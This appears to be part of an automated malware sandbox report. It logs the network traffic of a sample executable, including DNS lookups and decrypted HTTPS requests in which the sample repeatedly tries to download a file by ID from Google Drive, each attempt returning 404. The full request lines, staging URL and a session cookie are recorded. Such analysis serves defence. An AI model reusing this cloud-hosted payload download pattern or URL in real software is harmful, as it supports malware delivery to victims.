                                                                          Jan 10, 2025 15:38:10.499576092 CET49810443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:10.500766993 CET44349810142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:10.501024961 CET49810443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:10.502190113 CET49810443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:10.502208948 CET44349810142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:10.502696991 CET44349810142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:10.502862930 CET49810443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:10.503175020 CET49810443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:10.550210953 CET44349810142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:10.784295082 CET44349810142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:10.784492970 CET44349810142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:10.784668922 CET49810443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:10.784668922 CET49810443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:10.784823895 CET49810443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:10.784868002 CET44349810142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:10.847255945 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:10.847337008 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:10.847964048 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:10.847964048 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:10.848088980 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:11.101558924 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:11.101768017 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:11.102210999 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:11.102230072 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:11.102350950 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:11.102366924 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:11.455617905 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:11.455708981 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:11.455769062 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:11.455811977 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:11.455905914 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:11.455926895 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:11.456242085 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:11.456242085 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:11.456264019 CET44349811142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:11.456478119 CET49811443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:21.491847038 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:21.491961002 CET44349812142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:21.492341042 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:21.492552996 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:21.492618084 CET44349812142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:21.755582094 CET44349812142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:21.755738020 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:21.756042957 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:21.756064892 CET44349812142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:21.756140947 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:21.756162882 CET44349812142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:22.024020910 CET44349812142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:22.024223089 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:22.024247885 CET44349812142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:22.024437904 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:22.024507046 CET49812443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:22.024559021 CET44349812142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:22.025424004 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.025504112 CET44349813142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:22.025712013 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.025868893 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.025906086 CET44349813142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:22.284784079 CET44349813142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:22.285027981 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.285342932 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.285388947 CET44349813142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:22.285501003 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.285547018 CET44349813142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:22.624716043 CET44349813142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:22.624834061 CET44349813142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:22.624881983 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.625062943 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.625425100 CET49813443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:22.625441074 CET44349813142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:32.645358086 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:32.645376921 CET44349814142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:32.645524025 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:32.645747900 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:32.645756006 CET44349814142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:32.913265944 CET44349814142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:32.913476944 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:32.913830996 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:32.913878918 CET44349814142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:32.913973093 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:32.914019108 CET44349814142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:33.184262037 CET44349814142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:33.184457064 CET44349814142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:33.184562922 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:33.184676886 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:33.184724092 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:33.184724092 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:33.184777975 CET44349814142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:33.184894085 CET49814443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:33.185302019 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.185378075 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.185610056 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.188255072 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.188313007 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.446289062 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.446527004 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.446886063 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.446913958 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.446971893 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.446995020 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.775274038 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.775497913 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.775494099 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.775567055 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.775667906 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.775713921 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.775825977 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.775882006 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.775968075 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.775968075 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:33.776025057 CET44349815142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:33.776185036 CET49815443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:43.814834118 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:43.814946890 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:43.815290928 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:43.816214085 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:43.816277027 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.077436924 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.077645063 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.077948093 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.077994108 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.078087091 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.078116894 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.349354982 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.349567890 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.349625111 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.349858046 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.349917889 CET49816443192.168.11.20142.250.190.110
                                                                          Jan 10, 2025 15:38:44.349958897 CET44349816142.250.190.110192.168.11.20
                                                                          Jan 10, 2025 15:38:44.350305080 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.350409031 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.350600004 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.350840092 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.350897074 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.609752893 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.609937906 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.610301971 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.610356092 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.610395908 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.610420942 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.960947990 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.961072922 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.961158991 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.961189032 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.961281061 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.961549044 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.961704016 CET49817443192.168.11.20142.250.190.97
                                                                          Jan 10, 2025 15:38:44.961872101 CET44349817142.250.190.97192.168.11.20
                                                                          Jan 10, 2025 15:38:44.961997986 CET49817443192.168.11.20142.250.190.97

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 10, 2025 15:32:07.294373035 CET5915153192.168.11.201.1.1.1
                                                                          Jan 10, 2025 15:32:07.413742065 CET53591511.1.1.1192.168.11.20
                                                                          Jan 10, 2025 15:32:07.997942924 CET5465953192.168.11.201.1.1.1
                                                                          Jan 10, 2025 15:32:08.117649078 CET53546591.1.1.1192.168.11.20

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 10, 2025 15:32:07.294373035 CET192.168.11.201.1.1.10x2b1bStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                          Jan 10, 2025 15:32:07.997942924 CET192.168.11.201.1.1.10x8168Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 10, 2025 15:32:07.413742065 CET1.1.1.1192.168.11.200x2b1bNo error (0)drive.google.com142.250.190.110A (IP address)IN (0x0001)false
                                                                          Jan 10, 2025 15:32:08.117649078 CET1.1.1.1192.168.11.200x8168No error (0)drive.usercontent.google.com142.250.190.97A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • drive.google.com
                                                                          • drive.usercontent.google.com

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.11.2049746142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:07 UTC216OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          2025-01-10 14:32:07 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:07 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: script-src 'nonce-fw53fAioKHuPTZBdtCGS_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.11.2049747142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:08 UTC258OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          2025-01-10 14:32:08 UTC2218INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgQRxjkIGfA5tlLHI4sB_wrr9_aJ4a90vwOxRb3-tTucYZXp2uBX902t0BkusxBLWsjI
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:08 GMT
                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-aA_ZR0f0BCBgdPSoN7LX8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Set-Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU; expires=Sat, 12-Jul-2025 14:32:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:32:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 44 50 43 58 32 68 4e 68 39 54 5f 54 41 6e 55 64 46 37 6d 71 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sDPCX2hNh9T_TAnUdF7mqg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.11.2049748142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:19 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:19 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:19 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-yHZRtYMUPF1PsRO_R45pKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.11.2049749142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:19 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:19 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6nQVZzX7OjgneRLkuPxLFJSj3gieiGHHX7Yx6rofX72iClNoI2EAetFIedSoc1pP9J
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:19 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-QoWLUwcE8tb47_MzPxWpaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
